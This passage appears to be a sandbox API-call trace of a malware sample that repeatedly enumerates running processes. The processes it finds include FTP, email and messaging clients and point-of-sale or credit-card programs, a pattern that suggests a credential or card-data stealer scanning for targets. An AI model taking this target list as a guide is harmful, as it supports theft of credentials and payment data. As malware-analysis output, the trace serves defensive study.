lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xeb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0259.714] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xec4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0259.767] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xecc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0259.770] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xed4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0259.773] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xedc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0259.776] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0259.783] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0259.786] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0259.789] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf1c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0259.797] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0259.800] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0259.803] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0259.805] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0259.835] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0259.838] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0259.844] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0259.846] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0259.849] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0259.851] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfa0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0259.853] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0259.854] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0259.859] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0259.861] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0259.863] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0259.864] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0259.866] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x858, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0259.868] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0259.870] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xe54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0259.875] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x660, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0259.876] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb2c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0259.878] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x72c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0259.879] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1004, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0259.881] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1014, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0259.883] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x101c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0259.884] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x102c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0259.939] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x103c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0259.940] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0259.942] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1054, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0259.943] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x108c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="discussion.exe")) returned 1 [0259.945] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1094, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="styledesignbusiness.exe")) returned 1 [0259.946] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x109c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="new_door.exe")) returned 1 [0259.948] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="bed fight.exe")) returned 1 [0259.952] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="federal hotel.exe")) returned 1 [0259.954] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0259.955] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0259.956] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0259.958] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0259.959] CloseHandle (hObject=0x1d14) returned 1 [0259.959] Sleep (dwMilliseconds=0x64) [0260.080] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1d14 [0260.096] Process32First (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.098] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x73, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0260.100] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x138, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0260.102] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.104] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x17c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0260.109] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0260.111] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0260.113] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0260.115] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0260.118] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.154] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.157] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x30c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1fc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0260.159] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x45, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.161] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.163] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x390, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.165] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.170] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.172] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x210, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.174] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.175] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0260.177] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0260.179] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x604, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0260.180] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.182] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x798, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0260.186] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0260.188] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x894, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0260.190] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0260.192] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x360, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0260.194] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0260.196] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0260.197] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x670, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0260.252] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x9d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x274, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0260.254] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x670, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0260.256] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x428, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="degree_sing_pretty.exe")) returned 1 [0260.258] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="work-heavy.exe")) returned 1 [0260.260] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x7b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0260.265] Process32Next (in: hSnapshot=0x1d14, lppe=0x106efe20 | out: lppe=0x106efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, 